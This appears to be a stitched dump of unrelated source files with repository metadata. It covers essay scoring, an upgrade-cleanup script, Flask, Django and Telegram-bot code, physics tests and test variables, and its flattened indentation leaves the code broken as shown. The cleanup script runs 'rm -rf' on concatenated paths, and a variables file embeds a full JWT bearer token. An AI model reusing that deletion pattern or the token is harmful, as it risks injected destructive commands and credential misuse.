TaggedWords = returnPOSTaggedWords(essay)
wordCount=returnWordCount(essay)*1.0
adjCount=(returnAdjectiveCount(TaggedWords)/wordCount) * 100
advCount=(returnAdverbCount(TaggedWords)/wordCount) * 100
nounCount=(returnNounCount(TaggedWords)/wordCount) * 100
verbCount=(returnVerbCount(TaggedWords)/wordCount) * 100
sentenceCount=returnSentenceCount(essay)
commaCount=returnCommaCount(essay)
coherenceScore=lsaObj.calculateCoherence(essay) * 100
#spellingScore = returnSpellingScore(essay)
#grammarScore = returnGrammarScore(essay)
print "\n\nEvaluating Essay...\n"
print "Adjective Count -> ",adjCount
print "Adverb Count -> ",advCount
print "Noun Count -> ",nounCount
print "Verb Count -> ",verbCount
print "Word Count -> ",wordCount
print "Sentence Count -> ",sentenceCount
print "Comma Count -> ",commaCount
print "Average Coherence ->",coherenceScore
#print "Spelling Score ->",spellingScore
#print "Grammar Score ->",grammarScore
predicted_score=c+(m1*adjCount)+(m2*advCount)+(m3*nounCount)+(m4*verbCount)+(m5*wordCount)+(m6*sentenceCount)+(m7*commaCount)+(m8*coherenceScore)
print "Predicted Score of Essay --> ", predicted_score
def main():
print "\nReading Essays and Building Regression Model...\n"
csvfile=csv.reader(open("training_set_rel3.csv","rb")) #Opens csv file
i=0;
count=0
essays=[]
grades=[]
for row in csvfile: #Reads the 1st 10 records
if i==0:
i=i+1
continue
if i==10:
break
else:
essays.append(row[2]) #3rd column in the sheet has the essay
grades.append(row[6]) #7th column has the cumulative grade
count=count+1;
i=i+1
g=0
essayGrades=[]
arrayVariable1=[]
arrayVariable2=[]
arrayVariable3=[]
arrayVariable4=[]
arrayVariable5=[]
arrayVariable6=[]
arrayVariable7=[]
arrayVariableLSACoherence = []
#arrayVariableSpellingScore = []
#arrayVariableGrammarScore=[]
for essay in essays:
print "Reading Essay %d ..." % (g+1)
output = returnPOSTaggedWords(essay)
grade=grades[g]
g=g+1
essayGrades.append(grade)
wordCount = returnWordCount(essay) *1.0
adjective=(returnAdjectiveCount(output)/wordCount) * 100
adverb=(returnAdverbCount(output)/wordCount) * 100
noun=(returnNounCount(output)/wordCount) * 100
verb=(returnVerbCount(output)/wordCount) * 100
sentenceCount = returnSentenceCount(essay)
commaCount = returnCommaCount(essay)
coherenceScore = lsaObj.calculateCoherence(essay) * 100
#spellingScore = returnSpellingScore(essay)
#grammarScore = returnGrammarScore(essay)
arrayVariable1.append(adjective)
arrayVariable2.append(adverb)
arrayVariable3.append(noun)
arrayVariable4.append(verb)
arrayVariable5.append(wordCount)
arrayVariable6.append(sentenceCount)
arrayVariable7.append(commaCount)
arrayVariableLSACoherence.append(coherenceScore)
#arrayVariableSpellingScore.append(spellingScore)
#arrayVariableGrammarScore.append(grammarScore)
print "\nApplying Regression...\n"
x = np.array([arrayVariable1, arrayVariable2, arrayVariable3, arrayVariable4, arrayVariable5, arrayVariable6, arrayVariable7, arrayVariableLSACoherence], np.int32)
y=np.array(essayGrades) #Array for the assigned grades
nn = np.max(x.shape)
X = np.vstack([x,np.ones(nn)]).T #Preparing for regression function
print X
print y
coeff = np.linalg.lstsq(X, y)[0]
print coeff
print "\nAdj Count Weight--> ", coeff[0]
print "Adv Count Weight--> ", coeff[1]
print "Noun Count Weight--> ", coeff[2]
print "Verb Count Weight--> ", coeff[3]
print "Word Count Weight--> ", coeff[4]
print "Sentence Count Weight--> ", coeff[5]
print "Comma Count Weight--> ", coeff[6]
print "Average Coherence Weight--> ", coeff[7]
#print "Spelling Score Weight, --> ", coeff[8]
#print "Grammar Score Weight, --> ", coeff[9]
print "Fitted Line's Constant Value, c --> ", coeff[8]
# plt.plot(arrayVariable1, y, 'o', label='Original data', markersize=10) #Plotting graphically
# plt.plot(arrayVariable1, coeff[0]*arrayVariable1 + coeff[2], 'r', label='Fitted line')
# plt.xlabel('Kappa Value')
# plt.ylabel('Score')
# plt.legend()
# plt.show()
#
print "\nEVALUATION MODEL READY\n"
print "Evaluating essay..."
#This is the target essay. Row no 15th on the sheet
filename = "testEssays.txt"
while filename != 'exit':
with open(filename) as fp:
for line in fp:
testText = line
evaluateEssay(testText,coeff)
filename = raw_input("\nEnter filename or type \'exit\' to exit: ")
if __name__ == '__main__':
main()
|
[
"ganzse7en@gmail.com"
] |
ganzse7en@gmail.com
|
7fbc0b70a1d798c7fa7d95d7619db076660ac08c
|
c957a774fc496f4e2e48a84c44af47ff763dbdee
|
/rmupgrade.py
|
a80a9c836d7bb1abd4e5d53b7825da073db52352
|
[] |
no_license
|
lfyhex/PythoneQtLanguage
|
acdd536ef630ac4aafcae8c68b80edeaa809063d
|
2e554eeb0ab3cc45a09c27c5e7c6f9eb698501b5
|
refs/heads/master
| 2021-01-19T04:50:15.660166
| 2017-02-04T07:15:02
| 2017-02-04T07:15:02
| 50,153,973
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,419
|
py
|
import os
import sys
from datetime import datetime
from datetime import timedelta
import time
import re
"""
list upgrade files and dirs
"""
def exactVersion(strFile):
ma=re.search(r'[\d]+\.[\d]+\.[\d]+', strFile)
return ma.group(0)
def max_version(v1, v2):
lstV1 = v1.split(".")
lstV2 = v2.split(".")
ret = 0
for d in range(len(lstV1)):
intV1 = int(lstV1[d])
intV2 = int(lstV2[d])
if intV1 > intV2:
ret = 1
break
elif intV1 < intV2:
ret = -1
break
return ret
def classification_max_versions(lst):
odd_versions = set([])
even_versions = set([])
for f in lst:
if '_upgrade' in f:
strV = exactVersion(f)
last_char = strV[-1]
n = int(last_char)
if n % 2 == 0:
even_versions.add(strV)
else:
odd_versions.add(strV)
odd_max = "0.0.0"
even_max = "0.0.0"
for s in odd_versions:
cmp_res = max_version(s, odd_max)
if (cmp_res == 1):
odd_max = s
for s in even_versions:
cmp_res = max_version(s, even_max)
if (cmp_res == 1):
even_max = s
res = []
if (len(odd_max)):
res.append(odd_max)
if (len(even_max)):
res.append(even_max)
return res
def list_upgrade(fpath, lst):
if not os.path.exists(fpath):
print(fpath + " is not exits!!!")
return
absfpath = os.path.abspath(fpath)
cur_date = datetime.now()
lstfiles = os.listdir(absfpath)
max_versions = classification_max_versions(lstfiles)
for f in lstfiles:
newpath = absfpath + '/' + f
if '_upgrade' in f:
strV = exactVersion(f)
if strV in max_versions:
continue
#two month ago
stat_info = os.stat(newpath)
stat_date = datetime.fromtimestamp(stat_info.st_ctime)
t_date = stat_date + timedelta(60)
if (cur_date > t_date):
print('----append path----' + newpath)
lst.append(newpath)
else:
print('*********upgrade blow two moth*********')
print(f)
else:
if f.endswith('.app'):
print('not into app contents')
elif os.path.isdir(newpath):
print('go to sub dir' + newpath)
list_upgrade(newpath, lst)
def rm_files(lstPath):
for ipath in lstPath:
if os.path.exists(ipaht):
os.system('rm -rf ' + ipaht)
if __name__=="__main__":
argvs = sys.argv
if len(argvs) == 3:
if argvs[1] == 'rm':
inputFile = open(argvs[2], 'r')
for l in inputFile:
rmfilepath = l.strip()
if os.path.exists(rmfilepath):
print('remove ' + rmfilepath)
os.system('rm -rf ' + '"' + rmfilepath + '"')
elif argvs[1] == 'list':
lstret = []
list_upgrade(argvs[2], lstret)
fresult = open('list_result.txt', 'w')
print('----start print result----')
for i in lstret:
print(i)
fresult.write(i)
fresult.write("\n")
fresult.flush()
print('----end----')
else:
print("usage: list | rm file path")
|
[
"lfy_hex@hotmail.com"
] |
lfy_hex@hotmail.com
|
5b1263a6ea43e9710528b7ab437313e5f610b2c1
|
ab7a88e309012b2219dd6ef12c0ab51576941577
|
/venv36/Scripts/pip3.6-script.py
|
fd22bdd9cb0dc4e7980a8bae4e08d2aad1af6f03
|
[] |
no_license
|
fly904021125/PythonSecondDemo
|
745b9f56e00d9032c184be7e098eab819aa596c1
|
8ad79cdb3628fcfde0dd7f919f9480dab4d361be
|
refs/heads/master
| 2020-03-18T05:31:41.576626
| 2018-05-22T02:02:43
| 2018-05-22T02:02:43
| 134,346,930
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
#!D:\PycharmProjects\SecondDemo\venv36\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3.6'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3.6')()
)
|
[
"fly904021125@126.com"
] |
fly904021125@126.com
|
cfd71321999d2657b65392a548166bb813ef5305
|
2f4b7a0d28ee01c9c08f4f014ba7e2e073997cbb
|
/rustkr/models/log.py
|
57ca6d4c4f6fe78facae95d27a7ba12c4fc73918
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
Niev/rust-kr
|
cbb025d0383e401e2b55a19492c28a971788d08f
|
de91097f1451e9c0a81bbaf64463311d3cc8ff1b
|
refs/heads/master
| 2020-12-25T12:57:04.406467
| 2013-05-09T15:07:03
| 2013-05-09T15:14:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 532
|
py
|
import threading
import settings
class Subscriber(threading.Thread):
def __init__(self, redis):
self.pubsub = redis.pubsub()
self.pubsub.subscribe(settings.CHANNEL + 'out')
self.result = None
threading.Thread.__init__(self)
def run(self):
self.listener = self.pubsub.listen()
while True:
message = self.listener.next()
if message['type'] == 'subscribe':
continue
self.result = message['data']
break
|
[
"jeong@youknowone.org"
] |
jeong@youknowone.org
|
fc24c8baef943aac4ef7d865c9a7d271421a0716
|
3c13fbde9fba1070877fb4cd49dae6e8ea2ada14
|
/main.py
|
991418fca57a4a8a50bc5f51fea57c216f42b8b2
|
[] |
no_license
|
GregorAilario/NFT_monitoring_bot
|
0c0dafcff9f730347f77b977fa0b94a9eb2cf00a
|
79507407d937f20722f8fc49127601e13995bfd7
|
refs/heads/master
| 2023-08-22T04:13:45.600517
| 2021-10-22T14:23:51
| 2021-10-22T14:23:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,337
|
py
|
import asyncio
import aiohttp
from aiogram import Bot, Dispatcher, types
from aiogram.utils import executor
from loguru import logger
from sqliter import SQLighter
from utils import get_floor_price_nft
COLLECTION_URL = 'https://qzlsklfacc.medianetwork.cloud/nft_for_sale?collection=%s'
NFT_URL = 'https://solanart.io/search/?token=%s'
logger.add('app.log', format="{time:YYYY-MM-DD HH:mm:ss} | {level} | {message}")
bot = Bot(token='BOT_TOKEN') # <- Your telegram bot token
dp = Dispatcher(bot)
db = SQLighter('nft_collection')
@logger.catch
@dp.message_handler(commands=['watchlist'])
async def show_watchlist(message: types.Message):
logger.info('Show watchlist')
watchlist = db.get_watchlist(message.chat.id)
result = 'Watchlist:\n\n'
for el in watchlist:
if el[2]: # started or not
result += f'{el[0]} - max price {el[1]}\n'
else:
result += f'{el[0]} - not started\n'
await message.answer(result)
@logger.catch
@dp.message_handler(commands=['add'])
async def add_collection(message: types.Message):
logger.info('Adding collection')
collection_name = message.get_args()
if len(collection_name.split()) != 1:
await message.answer('Invalid cmd call!\nExample:\n/add coll_name')
return
collection = await fetch_collection(collection_name)
if type(collection) is not list:
await message.answer('Invalid collection name!')
return
if db.collection_exists(collection_name, message.chat.id):
await message.answer('The collection has already been added!')
return
db.add_collection(collection_name, message.chat.id)
logger.info(f'{collection_name} collection added')
await message.answer(f'{collection_name} collection added!')
@logger.catch
@dp.message_handler(commands=['del'])
async def del_collection(message: types.Message):
logger.info('Delete collection')
collection_name = message.get_args()
if len(collection_name.split()) != 1:
await message.answer('Invalid cmd call!\nExample:\n/del coll_name')
return
if not db.collection_exists(collection_name, message.chat.id):
await message.answer('Collection does not exist in watchlist!')
return
db.delete_collection(collection_name, message.chat.id)
logger.info(f'{collection_name} collection deleted')
await message.answer('Collection deleted!')
@logger.catch
@dp.message_handler(commands=['start'])
async def start_watch(message: types.Message):
logger.info('Start watch')
args = message.get_args().split()
if len(args) != 2:
await message.answer('Invalid cmd call!\nExample:\n/start coll_name max_price')
return
if not db.collection_exists(args[0], message.chat.id):
collection = await fetch_collection(args[0])
if type(collection) is not list:
await message.answer('Invalid collection name!')
return
db.add_collection(args[0], message.chat.id)
if not args[1].replace('.', '', 1).isdigit():
await message.answer('Invalid price format')
return
db.start_watch(args[0], args[1], message.chat.id)
logger.info(f'Started watching {args[0]} with max price {args[1]}')
await message.answer(f'{args[0]} started with max price {args[1]}')
@logger.catch
@dp.message_handler(commands=['stop'])
async def stop_watch(message: types.Message):
logger.info('Stop watch')
collection_name = message.get_args()
if len(collection_name) == 0:
logger.info('Stop all alerts')
db.stop_all(message.chat.id)
await message.answer('All alerts stopped!')
return
if len(collection_name.split()) > 1:
await message.answer('Invalid cmd call!\nExample:\n/stop coll_name')
return
if not db.collection_exists(collection_name, message.chat.id):
await message.answer('Collection does not exist in watchlist!')
return
db.stop_watch(collection_name, message.chat.id)
logger.info(f'Stopped watching {collection_name}')
await message.answer(f'{collection_name} stopped!')
@logger.catch
async def monitor():
logger.info('Monitoring started')
while True:
collections = db.get_collections()
for collection in collections:
name, chat_id, max_price, last_nft_id = collection
res = await fetch_collection(name)
floor_price_nft = get_floor_price_nft(res)
if floor_price_nft['price'] <= max_price and floor_price_nft['id'] != last_nft_id:
db.update_last_nft_id(name, chat_id, floor_price_nft['id'])
logger.info(f'NEW NFT ALERT: {floor_price_nft}')
await bot.send_message(chat_id, NFT_URL % floor_price_nft['token_add'])
await asyncio.sleep(20)
await asyncio.sleep(10)
async def on_bot_start_up(dispatcher: Dispatcher) -> None:
"""List of actions which should be done before bot start"""
asyncio.create_task(monitor())
@logger.catch
async def fetch_collection(name):
session = aiohttp.ClientSession()
async with session.get(COLLECTION_URL % name) as res:
collection = await res.json()
await session.close()
return collection
if __name__ == '__main__':
executor.start_polling(dp, skip_updates=True, on_startup=on_bot_start_up)
|
[
"akmal.melibaev@gmail.com"
] |
akmal.melibaev@gmail.com
|
1b9599c265bef331503dca3eee9e49cf141f9426
|
94ba3fd8075e7358935816913a7c7fe2757cf8c2
|
/muspinsim/tests/test_celio.py
|
a6a554e646a983aa4cefa0bf04f111b476a97a35
|
[
"MIT"
] |
permissive
|
muon-spectroscopy-computational-project/muspinsim
|
c7ea505f082a6ef2ad5787aa43340821d96a6c18
|
e57dfd3420150ec749cba589e51f72f83d06e30a
|
refs/heads/main
| 2023-06-22T00:59:15.851277
| 2023-04-04T15:12:11
| 2023-04-04T15:12:11
| 330,638,091
| 2
| 1
|
MIT
| 2023-06-20T15:42:53
| 2021-01-18T10:59:14
|
Python
|
UTF-8
|
Python
| false
| false
| 5,734
|
py
|
import unittest
import numpy as np
from muspinsim.cpp import Celio_EvolveContrib
from muspinsim.celio import CelioHamiltonian
from muspinsim.spinop import DensityOperator
from muspinsim.spinsys import MuonSpinSystem, SingleTerm, SpinSystem
class TestCelioHamiltonian(unittest.TestCase):
def test_sum(self):
ssys = SpinSystem(["mu", "e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
extra_terms = [SingleTerm(ssys, 1, [0, 1, 0])]
H2 = CelioHamiltonian(extra_terms, 10, ssys)
H_sum = ssys.hamiltonian + H2
self.assertEqual(H_sum._terms[1], extra_terms[0])
def test_calc_H_contribs(self):
ssys = SpinSystem(["mu", "F", ("e", 2)], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0])
ssys.add_bilinear_term(0, 1, [[0, 0, 1], [0, 0, 1], [0, 0, 1]])
ssys.add_bilinear_term(0, 2, [[0, 0, -1], [0, 0, -1], [0, 0, -1]])
H = ssys.hamiltonian
H_contribs = H._calc_H_contribs()
self.assertEqual(len(H_contribs), 3)
def check_H_contrib(
H_contrib, matrix, other_dimension, spin_order, spin_dimensions
):
self.assertTrue(np.allclose(H_contrib.matrix.toarray(), matrix))
self.assertEqual(H_contrib.other_dimension, other_dimension)
self.assertTrue(np.allclose(H_contrib.spin_order, spin_order))
self.assertTrue(np.allclose(H_contrib.spin_dimensions, spin_dimensions))
check_H_contrib(
H_contrib=H_contribs[0],
matrix=[[0, 0.5], [0.5, 0]],
other_dimension=6,
spin_order=[0, 1, 2],
spin_dimensions=[2, 2, 3],
)
check_H_contrib(
H_contrib=H_contribs[1],
matrix=[
[0.25, 0, 0.25 - 0.25j, 0],
[0, -0.25, 0, -0.25 + 0.25j],
[0.25 + 0.25j, 0, -0.25, 0],
[0, -0.25 - 0.25j, 0, 0.25],
],
other_dimension=3,
spin_order=[0, 1, 2],
spin_dimensions=[2, 2, 3],
)
check_H_contrib(
H_contrib=H_contribs[2],
matrix=[
[-0.5, 0, 0, -0.5 + 0.5j, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0.5, 0, 0, 0.5 - 0.5j],
[-0.5 - 0.5j, 0, 0, 0.5, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0.5 + 0.5j, 0, 0, -0.5],
],
other_dimension=2,
spin_order=[0, 2, 1],
spin_dimensions=[2, 3, 2],
)
def test_calc_trotter_evol_op(self):
ssys = SpinSystem(["mu", "e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0])
H = ssys.hamiltonian
evol_op_contribs = H._calc_trotter_evol_op_contribs(1, False)
self.assertEqual(len(evol_op_contribs), 1)
self.assertTrue(
np.allclose(
evol_op_contribs[0].toarray(),
[
[0.95105652, 0, -0.30901699j, 0],
[0, 0.95105652, 0, -0.30901699j],
[-0.30901699j, 0, 0.95105652, 0],
[0, -0.30901699j, 0, 0.95105652],
],
)
)
# Should be 2x2 for the fast variant
ssys = SpinSystem(["mu", "e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0])
H = ssys.hamiltonian
evol_op_contribs = H._calc_trotter_evol_op_contribs(1, True)
self.assertEqual(len(evol_op_contribs), 1)
self.assertTrue(isinstance(evol_op_contribs[0], Celio_EvolveContrib))
self.assertTrue(
np.allclose(
evol_op_contribs[0].matrix,
[
[0.95105652, -0.30901699j],
[-0.30901699j, 0.95105652],
],
)
)
self.assertEqual(evol_op_contribs[0].other_dim, 2)
self.assertTrue(np.allclose(evol_op_contribs[0].indices, [0, 1, 2, 3]))
def test_evolve(self):
ssys = SpinSystem(["e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
H = ssys.hamiltonian
rho0 = DensityOperator.from_vectors() # Start along z
t = np.linspace(0, 1, 100)
self.assertTrue(isinstance(H, CelioHamiltonian))
evol = H.evolve(rho0, t, [ssys.operator({0: "z"})])
self.assertTrue(np.all(np.isclose(evol[:, 0], 0.5 * np.cos(2 * np.pi * t))))
def test_evolve_invalid(self):
ssys = SpinSystem(["e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
H = ssys.hamiltonian
rho0 = DensityOperator.from_vectors() # Start along z
t = np.linspace(0, 1, 100)
# No SpinOperator
with self.assertRaises(ValueError):
H.evolve(rho0, t, [])
def test_fast_evolve(self):
ssys = MuonSpinSystem(["mu", "e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
H = ssys.hamiltonian
t = np.linspace(0, 1, 100)
self.assertTrue(isinstance(H, CelioHamiltonian))
# Start along z
evol = H.fast_evolve(ssys.sigma_mu([0, 0, 1]), t, 10)
# This test is subject to randomness, but np.isclose appears to avoid
# any issues
self.assertTrue(np.all(np.isclose(evol[:], 0.5 * np.cos(2 * np.pi * t))))
def test_integrate(self):
ssys = SpinSystem(["e"], celio_k=10)
ssys.add_linear_term(0, [1, 0, 0]) # Precession around x
H = ssys.hamiltonian
rho0 = DensityOperator.from_vectors() # Start along z
with self.assertRaises(NotImplementedError):
H.integrate_decaying(rho0, 1.0, ssys.operator({0: "z"}))
|
[
"joel.davies@stfc.ac.uk"
] |
joel.davies@stfc.ac.uk
|
6ed21186021b770676ebbd1275689ead2808d4fb
|
f3aed9aa1eca9bc39c6efbf034aa53badd4da4dc
|
/impuesto_renta/views.py
|
7be50695f277985613ca37279fdf6ba1426a777c
|
[] |
no_license
|
erickvh/payroll-app
|
f745a7514fc66095600d25c662b52792ea5813fa
|
6c597581eea78c40209cbe05acc6f36d97d77dd2
|
refs/heads/master
| 2023-02-03T10:56:25.433749
| 2020-06-26T22:51:31
| 2020-06-26T22:51:31
| 256,535,061
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,140
|
py
|
from django.http import HttpResponse
from django.template import loader
from django.http import Http404
from django.shortcuts import get_object_or_404,render,redirect
from django.contrib import messages
#imports del modelo
from .models import ImpuestoRenta
from .forms import RentaForm
# Create your views here.
def index_renta(request):
renta_list = ImpuestoRenta.objects.all().order_by('id')
return render(request, 'impuesto_renta/index.html', {'renta_list': renta_list})
def edit_renta(request,renta_id):
renta = get_object_or_404(ImpuestoRenta,pk=renta_id)
return render(request, 'impuesto_renta/edit.html', {'renta': renta})
def update_renta(request, renta_id):
renta = get_object_or_404(ImpuestoRenta,pk=renta_id)
if request.method == 'POST':
form = RentaForm(request.POST, instance=renta)
if form.is_valid():
form.save()
messages.success(request, 'Impuesto de Renta actualizado correctamente')
else:
errors=form.errors
return render(request, 'impuesto_renta/edit.html',{'errors': errors, 'renta':renta})
return redirect('/renta')
|
[
"zoilavillatoro6694@outlook.com"
] |
zoilavillatoro6694@outlook.com
|
54d25836e06aa3d8d4aa4b989e5f43d916beaea0
|
7400e1d7ff7145ea8c136e955f36aa1edbc37415
|
/groupwise-2.0/project/home/views.py
|
40efbbc2ddbbbfaea2a515d4bfdf0d49001f5688
|
[] |
no_license
|
Dai0526/ASE-Fall2016
|
f62d48e67b1da8fdde2a44f25f51e7adea0d1ada
|
be87c528ff7b72d9e47e1aa2ef6a2f60e4409f44
|
refs/heads/master
| 2021-01-12T15:16:31.719304
| 2016-12-16T17:15:22
| 2016-12-16T17:15:22
| 69,819,155
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,898
|
py
|
# imports
from datetime import datetime
from flask import Flask, request, session, url_for, redirect, \
render_template, abort, g, flash, _app_ctx_stack,make_response, Response, Blueprint
from functools import wraps
from flask_bootstrap import Bootstrap
from project import db
from project.models import *
# config
home_blueprint = Blueprint(
'home', __name__,
template_folder='templates'
)
@home_blueprint.before_request
def before_request():
g.user = None
if 'user_id' in session:
g.user = db.session.query(User).filter_by(id=session['user_id']).first()
# login required decorator
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'user_id' in session:
return f(*args, **kwargs)
else:
flash('You need to login first.')
return redirect(url_for('users.login'))
return wrap
# use decorators to link the function to a url
@home_blueprint.route('/', methods=['GET', 'POST'])
def index():
"""Shows a users timeline or if no user is logged in it will
redirect to the public timeline. This timeline shows the user's
messages as well as all the messages of followed users.
"""
# if 'user_id' not in session:
# return render_template('/login.html', error="please login first")
if not g.user:
return redirect(url_for('home.public_timeline'))
messages = db.session.query(Message).filter_by(author_id=session['user_id']).order_by(Message.pub_date.desc()).limit(30).all()
resp = make_response(render_template('pub_timeline.html', messages=messages))
# resp.headers.add('Cache-Control','no-store,no-cache,must-revalidate,post-check=0,pre-check=0')
return resp
@home_blueprint.route('/public')
def public_timeline():
"""Displays the latest messages of all users."""
messages = db.session.query(Message).order_by(Message.pub_date.desc()).limit(30).all()
return render_template('pub_timeline.html', messages=messages)
@home_blueprint.route('/my_timeline', methods=['GET', 'POST'])
def timeline():
"""Shows a users timeline or if no user is logged in it will
redirect to the public timeline. This timeline shows the user's
messages as well as all the messages of followed users.
"""
if 'user_id' not in session:
return render_template('/login.html', error="please login first")
if not g.user:
return redirect(url_for('home.public_timeline'))
messages = db.session.query(Message).filter_by(author_id=session['user_id']).order_by(Message.pub_date.desc()).limit(30).all()
resp = make_response(render_template('timeline.html', messages=messages))
resp.headers.add('Cache-Control', 'no-store,no-cache,must-revalidate,post-check=0,pre-check=0')
return resp
@home_blueprint.route('/add_message', methods=['POST'])
@login_required
def add_message():
"""
Registers a new message for the user.
"""
if not g.user:
abort(401)
if request.form['text']:
new_message = Message(request.form['text'], session['user_id'])
db.session.add(new_message)
db.session.commit()
flash('Your message was recorded')
return redirect(url_for('home.timeline'))
@home_blueprint.route('/<username>')
def user_timeline(username):
if 'user_id' not in session:
return render_template('/login.html', error="please login first")
"""Display's a users tweets."""
profile_user = db.session.query(User).filter_by(username=username).first()
if profile_user is None:
abort(404)
messages = db.session.query(Message).filter_by(author_id=profile_user.id).order_by(Message.pub_date.desc()).limit(30).all()
resp = make_response(render_template('timeline.html', messages=messages, profile_user=profile_user))
resp.headers.add('Cache-Control','no-store,no-cache,must-revalidate,post-check=0,pre-check=0')
return resp
|
[
"tianhuaf0526@gmail.com"
] |
tianhuaf0526@gmail.com
|
293314d10f984b9284cc3e7c53b2b9ee5673aa61
|
14d35eccfca51ab90ba7a0529993cd5c9ed6218a
|
/template/variables/datafeed_incidents/development_variables.py
|
dade9a112e6f9250b8a1eb46b4e5e7c73d4077a9
|
[] |
no_license
|
gparrar/testing_framework
|
823645f858e134b246d61be927ac949acfdd09ac
|
e4bc60da78605fa2aa72b74eadedd2a16b18db2a
|
refs/heads/master
| 2023-01-12T12:54:15.739716
| 2019-06-26T22:53:04
| 2019-06-26T22:53:04
| 193,987,584
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,344
|
py
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
# Environment
USER_TOKEN = """eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICJGSjg2R2NGM2pUYk5MT2NvNE52WmtVQ0lVbWZZQ3FvcXRPUWVNZmJoTmxFIn0.eyJqdGkiOiI0MjkxNjFjMi1mYzgyLTQ2MDItYTRhOS03ZjQyYjNlY2ZlMDMiLCJleHAiOjE1MTY2NDE0MDksIm5iZiI6MCwiaWF0IjoxNTE2NjQwNTA5LCJpc3MiOiJodHRwczovL2RldmVsb3BtZW50Lm1vYmlsaXR5LndvY3MzLmNvbS9hdXRoL3JlYWxtcy93b3JsZHNlbnNpbmctbW9iaWxpdHkiLCJhdWQiOiJyb2JvdCIsInN1YiI6ImNiODdkZTQwLTU2NTYtNDNiYS05Y2YxLTcyYzc3MjMzNzg3YiIsInR5cCI6IkJlYXJlciIsImF6cCI6InJvYm90IiwiYXV0aF90aW1lIjowLCJzZXNzaW9uX3N0YXRlIjoiOTU3MzNhODctYzdlMy00NDE2LWIzZGMtN2U5ZDIyODk4NmYzIiwiYWNyIjoiMSIsImFsbG93ZWQtb3JpZ2lucyI6WyJodHRwczovL2RldmVsb3BtZW50Lm1vYmlsaXR5LndvY3MzLmNvbS9hdXRoIl0sInJlYWxtX2FjY2VzcyI6eyJyb2xlcyI6WyJSZWFkQVBJVXNlciIsInVtYV9hdXRob3JpemF0aW9uIiwidXNlciJdfSwicmVzb3VyY2VfYWNjZXNzIjp7Im1vYmlsaXR5LXdlYi1hcHAiOnsicm9sZXMiOlsidXNlciJdfSwiYWNjb3VudCI6eyJyb2xlcyI6WyJtYW5hZ2UtYWNjb3VudCIsIm1hbmFnZS1hY2NvdW50LWxpbmtzIiwidmlldy1wcm9maWxlIl19fSwicHJlZmVycmVkX3VzZXJuYW1lIjoicm9ib3QtdXNlciJ9.Ecf68DS8oT3ZNofE008ig6ufshhkE3omyKjmZnxc-8Vf8Ab_upM90KwjPvQPG0E39w_WleSMoRIxGHtLp1ZA25oWJrU36GgertQ7oklWuNMMNaY7IbkIt5u8_UvqOgVhQupqpoY4rY4Wyy7Okj7g-xk5b5rs70ONh70BoL89Le4"""
# Left Menu
menu_button = '//*[@id="Incidents"]'
icon_xpath = menu_button + "/div[1]/img"
label_xpath = menu_button + "/div[2]"
menu_button_id = "id:Incidents"
menu_title_path = 'xpath://span[contains(@class, "mainTitleText")]' # TODO move to global
menu_title = "INCIDENTS"
menu_tooltip = "Incidents Insights"
title = "Incidents"
# Map
map_tile = """//*[@id="map"]/div[1]/div[1]/div[2]/div[2]/img[1]"""
# Queries
INCIDENT_ID = 166
AREA_ID = 4
INCIDENT_TYPES = "/mb/data/api/v2/sql?q=SELECT%20name%20FROM%20df_incidences_types"
CURRENT_INCIDENTS = "/mb/data/api/v2/sql?q=SELECT%20*%20FROM%20df_incidences_count_open_mview"
CURRENT_MI = "/mb/data/api/v2/sql?q=SELECT%20*%20FROM%20df_incidences_open_global_current_matching_mview"
INCIDENTS_TABLE = "/mb/data/api/v2/sql?q=SELECT%20i.title%2C%20t.name%2C%20i.impact%2C%20i.start_time%2C%20i.type%20%20FROM%20df_incidences_open_mview%20i%20INNER%20JOIN%20df_incidences_types%20t%20ON%20i.type%20%3D%20t.id"
SPECIFIC_INCIDENT = "/mb/data/api/v2/sql?q=SELECT%20i.*%2C%20t.name%20FROM%20df_incidences_open_mview%20i%20INNER%20JOIN%20df_incidences_types%20t%20ON%20i.type%20%3D%20t.id%20WHERE%20incidence_id%3D{}".format(INCIDENT_ID)
SPECIFIC_AREA = "/mb/data/api/v2/sql?q=SELECT%20*%20FROM%20df_incidences_count_open_areas_mview%20WHERE%20area_id%3D{}".format(AREA_ID)
AREA_NAME = "/mb/data/api/v2/sql?q=SELECT%20geom.area_name%2C%20inc.*%20FROM%20df_incidences_count_open_areas_mview%20inc%20%0A%20%20%20%20%20%20%20%20%20%20INNER%20JOIN%20df_incidences_areas_geom%20geom%20ON%20inc.area_id%20%3D%20geom.area_id%20WHERE%20inc.area_id%3D{}".format(AREA_ID)
AREA_MI = "/mb/data/api/v2/sql?q=SELECT%20*%20FROM%20df_incidences_open_areas_current_matching_mview%20WHERE%20area_id%3D{}".format(AREA_ID)
# Private Layers
top_layers_base = '//div[contains(@class, "topLayerManager__style")]'
image = '//div[contains(@class,"image-wrapper")]/img'
